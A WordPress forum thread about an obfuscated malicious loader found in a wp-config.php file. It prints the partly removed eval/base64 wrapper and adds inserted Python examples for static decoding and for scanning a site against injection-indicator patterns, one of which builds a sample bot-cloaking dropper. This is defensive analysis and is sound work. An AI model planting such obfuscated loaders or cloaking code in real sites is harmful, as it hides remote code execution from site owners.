  1. #1
    SitePoint Guru

    Found hidden WP malicious code

    I checked out my wp-config.php file and found this code at the top. Anyone know what it is or who can decode it?

    Code:
    <?php
    // (the original line pads "<?php" with a long run of spaces so the payload sits off-screen in most editors)
    // each array decodes to a string via chr(n - offset): this one (offset 4154) is "eval"
    $NehPYG= array('4255','4272','4251','4262');
    // offset 2872: "create_function"
    $AhKDUwIzLXpP2hcO4nPrU0y= array('2971','2986','2973','2969','2988','2973','2967','2974','2989','2982','2971','2988','2977','2983','2982');
    // offset 3908: "base64_decode"
    $GDNIrktQr4jbqSB2FQHxYJbTXRaHHzdA2R9j2sZjm9lDR= array('4006','4005','4023','4009','3962','3960','4003','4008','4009','4007','4019','4008','4009');
    // the payload: itself base64 of another eval(base64_decode("...")) wrapper, nested several times (middle removed by moderator)
    $OacCikY0ctQ4XpKujTp27vMTygKKYeNWfPooZdf2xWWlbxGkg="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVVRJeGMySlZiRVJhT
    ..........
    yUnNiSE5QV0hCclVqQmFOVnBGVG01aFZtUnlUVVJHYUdGcmNEUlVWV2hQWWpGd2MwOVhjRnBXTTJoNlYxY3hSMkZ0UmpWVFdFSlFaREk1VEZwc1JuZFBWVTUxVFVWemFVdFRhemRKUVQwOUlpa3BPeUE9IikpOyA=";
    if (!function_exists("o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0")){
        // the decoder: subtract the per-array offset from every element and turn it into a character
        function o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($M9KqHq1KYdNOwDLWmEWRFlFISb4hpKj1K,$dia9SYcvCyZ){
            $ZbI6TeioM1pH = '';
            foreach($M9KqHq1KYdNOwDLWmEWRFlFISb4hpKj1K as $chiwS1E01EIQG3i5SnfUWcD1lSD){
                $ZbI6TeioM1pH .= chr($chiwS1E01EIQG3i5SnfUWcD1lSD - $dia9SYcvCyZ);
            }
            return $ZbI6TeioM1pH;
        }
        $EErbDZzvLO34AbJRbQal = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($NehPYG,4154);            // "eval"
        $VlQpSPGCFXX9eYD = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($AhKDUwIzLXpP2hcO4nPrU0y,2872); // "create_function"
        $mYF2SAsT99UPa6p = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($GDNIrktQr4jbqSB2FQHxYJbTXRaHHzdA2R9j2sZjm9lDR,3908); // "base64_decode"
        // builds create_function('$b5...', 'eval(base64_decode($b5...));') and runs it on the payload
        $f6E0LathXg = $VlQpSPGCFXX9eYD('$b5KWjzsbhSt1StMytIOIQKcHmc0t07zS2aFbzXcHFwyoP',$EErbDZzvLO34AbJRbQal.'('.$mYF2SAsT99UPa6p.'($b5KWjzsbhSt1StMytIOIQKcHmc0t07zS2aFbzXcHFwyoP));');
        $f6E0LathXg($OacCikY0ctQ4XpKujTp27vMTygKKYeNWfPooZdf2xWWlbxGkg);
    }
    ?>
    Last edited by Mittineague; Jan 16, 2014 at 08:41. Reason: please do post malcode
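
Added example (not from the original post or any reply in the thread): the wrapper above hides its function names as integer arrays with a per-array subtraction offset, and the long string is base64 wrapped in further eval(base64_decode("...")) layers. The Python below recovers the names from the arrays and offsets copied from the post, and statically peels the nested base64 layers of the visible head of the string, without executing anything. The elided middle of the string is not available, so only the wrapper structure is recovered, not the final payload; POSTED_EXCERPT and PAYLOAD_HEAD are copied from the post above, everything else is this example's own code.

```python
import base64
import re
from typing import Dict, List

# Excerpt copied from the snippet posted above: the three integer arrays and the
# three calls that turn them back into strings (the decode function itself just
# does chr(n - offset) over each array).
POSTED_EXCERPT = r"""
$NehPYG= array('4255','4272','4251','4262');
$AhKDUwIzLXpP2hcO4nPrU0y= array('2971','2986','2973','2969','2988','2973','2967','2974','2989','2982','2971','2988','2977','2983','2982');
$GDNIrktQr4jbqSB2FQHxYJbTXRaHHzdA2R9j2sZjm9lDR= array('4006','4005','4023','4009','3962','3960','4003','4008','4009','4007','4019','4008','4009');
$EErbDZzvLO34AbJRbQal = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($NehPYG,4154);
$VlQpSPGCFXX9eYD = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($AhKDUwIzLXpP2hcO4nPrU0y,2872);
$mYF2SAsT99UPa6p = o50mXG2pm2aLNaQ9Ix1VpIsWhOqagtk4oagbH8qT0($GDNIrktQr4jbqSB2FQHxYJbTXRaHHzdA2R9j2sZjm9lDR,3908);
"""

# Only the visible head of the base64 string from the post; the middle was
# removed by the moderator and is NOT reconstructed here.
PAYLOAD_HEAD = (
    "ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxL"
    "Q0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5W"
    "a3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVVRJ"
    "eGMySlZiRVJhT"
)

MARKER = b'eval(base64_decode("'

ARRAY_RE = re.compile(r"\$(\w+)\s*=\s*array\(([^)]*)\)")
CALL_RE = re.compile(r"\w+\(\s*\$(\w+)\s*,\s*(\d+)\s*\)")


def decode_offset_arrays(php_source: str) -> Dict[str, str]:
    """Map each integer array to the string it hides: chr(n - offset) per element."""
    arrays = {}
    for name, body in ARRAY_RE.findall(php_source):
        arrays[name] = [int(tok.strip(" '\"")) for tok in body.split(",") if tok.strip()]
    recovered = {}
    for name, offset in CALL_RE.findall(php_source):
        if name in arrays:
            recovered[name] = "".join(chr(n - int(offset)) for n in arrays[name])
    return recovered


def peel_base64_layers(blob: str, max_layers: int = 16) -> List[bytes]:
    """Statically unwrap nested eval(base64_decode("...")) layers.

    Every decoded layer is returned; unwrapping stops at the first layer that is
    not another eval(base64_decode(" wrapper. The input is trimmed to a multiple
    of four characters so a truncated string still decodes as far as it goes.
    """
    layers = []
    current = blob.strip()
    for _ in range(max_layers):
        usable = current[: len(current) // 4 * 4]
        if not usable:
            break
        decoded = base64.b64decode(usable)
        layers.append(decoded)
        if not decoded.startswith(MARKER):
            break
        inner = decoded[len(MARKER):]
        quote = inner.find(b'"')
        if quote != -1:
            inner = inner[:quote]
        current = inner.decode("ascii", errors="ignore")
    return layers


if __name__ == "__main__":
    for var, value in decode_offset_arrays(POSTED_EXCERPT).items():
        print(f"${var} -> {value!r}")
    for depth, layer in enumerate(peel_base64_layers(PAYLOAD_HEAD), 1):
        print(f"layer {depth}: {layer[:40]!r}{'...' if len(layer) > 40 else ''}")
```

Run as-is it prints the three recovered names (eval, create_function, base64_decode, so the snippet builds create_function('$x', 'eval(base64_decode($x));') and calls it on the string) and shows that the visible head is at least three eval(base64_decode(" wrappers deep. Everything here is string handling; nothing from the sample is ever evaluated, which is the only safe way to look at code like this.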

  2. #2
    Force Flow
    Since the middle portion of the code has been removed, it's impossible to decode it.

    However, you're correct in identifying that it should not be there.

    From what I've seen in the past, the most common code injections display alternative search results to search engine bots, such as advertising pharmacy drugs and the like.

    It likely isn't the only place where you have malicious code injected into files on your site.

  3. #3
    SitePoint Addict
    The best thing would be to do a clean install. Your database could contain injected code too depending on the vulnerability used.

  4. #4
    Mittineague
    I removed the majority of the code as we don't really need to make it any easier than it is for script-kiddies by posting something they can copy.

    Avast AV says
    Severity - High
    Status - Threat: PHP: Agent-RK [Trj]
    *Actually it seems it's a trojan downloader

    Kaspersky thread from 2006 http://forum.kaspersky.com/index.php?showtopic=21009
    Microsoft http://www.microsoft.com/security/po...n32%2fAgent.RK

  5. #5
    Mittineague
    You're definitely going to want to do more than just remove the code.

    I base64_decode'd it and, as best I can tell, it checks for various things, then uses curl to go to source sites to download files, writes them to temp dir(s), runs them, then unlink()s the files.
    That is, you more than likely have who knows what within both your files and database. I strongly suggest you take Patche's suggestion and do a clean install and then roll back your database to the last backup before this happened.

    If you haven't read Hardening WordPress you should do so.
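
Added example (not part of the thread) of the inventory step the replies above recommend before reinstalling: find every file under the web root that shows the same obfuscation signatures as the posted snippet, so you know what else was touched and can compare it against a clean WordPress copy. The indicator list, the two-hit threshold and the miniature site tree are all constructed for this example; it builds that tree in a temporary directory and scans it, so it runs offline. The same scan_text function can be fed dumped database rows (wp_posts content, wp_options values), since injections there carry the same markers.

```python
import os
import re
import tempfile
from typing import Dict, List

# Indicators for the kind of injection shown in this thread. Constructed for this
# example; tune the list and the threshold to your own site.
INDICATORS = [
    ("hidden-by-whitespace", re.compile(r"<\?php[ \t]{20,}\S")),
    ("eval", re.compile(r"\beval\s*\(")),
    ("base64_decode", re.compile(r"\bbase64_decode\s*\(")),
    ("create_function", re.compile(r"\bcreate_function\s*\(")),
    ("decompress", re.compile(r"\b(gzinflate|gzuncompress|str_rot13)\s*\(")),
    ("chr-arithmetic", re.compile(r"\bchr\s*\(\s*\$\w+\s*[-+]")),
    ("long-base64", re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")),
    ("downloader", re.compile(r"\b(curl_init|curl_setopt|file_get_contents|fopen)\s*\([^;]*https?://")),
    ("drop-and-run", re.compile(r"\b(sys_get_temp_dir|tempnam|unlink)\s*\(")),
    ("bot-cloaking", re.compile(r"HTTP_USER_AGENT[^;]*(googlebot|bingbot|slurp)", re.I)),
]
MIN_HITS = 2  # one hit alone (unlink() in core code, say) is not worth a report
SCAN_SUFFIXES = (".php", ".phtml", ".inc", ".htaccess")


def scan_text(text: str, relpath: str) -> List[str]:
    """Return the indicator names that fire on one file (or one DB row)."""
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    if relpath.endswith(".php") and "/uploads/" in "/" + relpath:
        hits.append("php-in-uploads")  # executable code under wp-content/uploads
    return hits


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk a web root and report files with at least MIN_HITS indicators."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.endswith(SCAN_SUFFIXES):
                continue
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="ignore") as fh:
                hits = scan_text(fh.read(), rel)
            if len(hits) >= MIN_HITS:
                findings[rel] = hits
    return findings


# A constructed miniature site: a clean index.php, a clean core file that happens
# to call unlink(), a wp-config.php carrying a wrapper modelled on the posted one
# (no literal "eval" anywhere in it), and a cloaking dropper parked under uploads/.
SAMPLE_SITE = {
    "index.php": "<?php\ndefine( 'WP_USE_THEMES', true );\nrequire __DIR__ . '/wp-blog-header.php';\n",
    "wp-includes/functions.php": (
        "<?php\nfunction wp_delete_file( $file ) {\n"
        "    $delete = apply_filters( 'wp_delete_file', $file );\n"
        "    if ( ! empty( $delete ) ) {\n        @unlink( $delete );\n    }\n}\n"
    ),
    "wp-config.php": (
        "<?php" + " " * 60
        + "$a= array('4255','4272','4251','4262');"
        + "$f = function($arr,$k){$s='';foreach($arr as $c){$s .= chr($c - $k);}return $s;};"
        + "$g = create_function('$p', $f($a,4154).'(base64_decode($p));');"
        + "$g('" + "ZXZhbChiYXNlNjRfZGVjb2RlKCJa" * 4 + "');?>\n"
        "<?php\n/** The name of the database for WordPress */\ndefine( 'DB_NAME', 'wordpress' );\n"
    ),
    "wp-content/uploads/2014/01/image.php": (
        "<?php\nif (stripos($_SERVER['HTTP_USER_AGENT'], 'googlebot') !== false) {\n"
        "    $ch = curl_init('http://example.invalid/feed.txt');\n"
        "    echo curl_exec($ch);\n}\n"
    ),
}


def build_sample_site(root: str) -> None:
    """Write the constructed sample tree under root."""
    for rel, content in SAMPLE_SITE.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)


def demo() -> Dict[str, List[str]]:
    """Build the sample tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(f"{path}: {', '.join(hits)}")
```

Point scan_tree at your real web root (or a tarball of it unpacked somewhere safe) and it reports the two planted files and leaves the clean ones alone; note that wp-config.php is caught on the whitespace padding, chr() arithmetic, create_function and the long base64 run even though the word "eval" never appears in it, which is why a plain grep for eval misses this family. Treat the output as a worklist for comparison against pristine WordPress, plugin and theme files, not as proof that anything not listed is clean.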
